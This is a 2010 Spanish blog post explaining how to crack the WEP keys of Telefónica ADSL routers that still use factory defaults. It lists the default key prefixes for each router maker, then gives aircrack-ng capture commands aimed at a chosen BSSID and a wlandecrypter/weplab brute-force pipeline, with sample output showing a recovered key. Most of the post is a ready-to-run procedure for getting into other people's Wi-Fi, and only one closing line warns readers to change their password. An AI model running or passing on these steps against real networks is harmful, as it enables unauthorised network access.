domingo, septiembre 19, 2010

Crackear wifis Timofónica en 2 minutos

Es sabido por todos que los routers ADSL de Telefónica vienen configurados con un ESSID determinado, por lo tanto es muy fácil localizar este tipo de redes.

Según el modelo del router la password de la red inalámbrica será una u otra, las passwords siguen un patrón común si no se cambia la que viene configurada por defecto:

Password: RaízXXXXYY

Según el modelo tienen una "raíz de contraseña"
Z-com -> Z001349
Zyxel -> Z001349
P-660HW-D1 -> Z001349
Xavy -> X000138
Comtrend -> C0030DA
Zygate -> Z0002CF o C0030DA

Por la MAC del AP se puede saber el fabricante.

Las dos últimas cifras YY son los dos últimos carácteres del ESSID --> WLAN_YY

Como veis solo faltan cuatro caracteres mas y tendremos la password completa.

El ataque que vamos a realizar de esos caracteres será por fuerza bruta, para ello vamos a emplear una herramienta llamada wlandecrypter.

También nos será necesario el software weplab y la suite aircrack-ng
apt-get install weplab aircrack-ng

Ahora que ya lo tenemos todo instalado comenzamos el proceso:

airmon-ng start wlan0 --> Pone en modo monitor la subinterfaz mon0
airodump-ng mon0 --> Miramos a ver que se ve por mon0
airodump-ng --write "captura_wlan" --channel "CANAL" --bssid "BSSID" mon0 --> Capturamos el tráfico de la Wifi que nos interesa.

Cuando tengamos 4 o mas paquetes en el campo data podemos parar la captura presionando Ctrl+C

Ahora es el momento de usar wlandecrypter.
wlandecrypter "BSSID" "ESSID" | weplab --key 128 -y --bssid "BSSID" captura_wlan.cap

Esto debería de sacarnos la password en ASCII y en Hexadecimal:
Right KEY found!!
Passphrase was --> C0030DAA46F05
Key: 43:30:30:33:30:44:41:41:34:36:46:30:35

En este caso se puede ver que se trata de un Comtrend:C0030 y el ESSID es WLAN_05: 05 por fuerza bruta hemos sacado los caracteres DAA46.

NOTA: Cambiad la password por defecto!!!

No hay comentarios: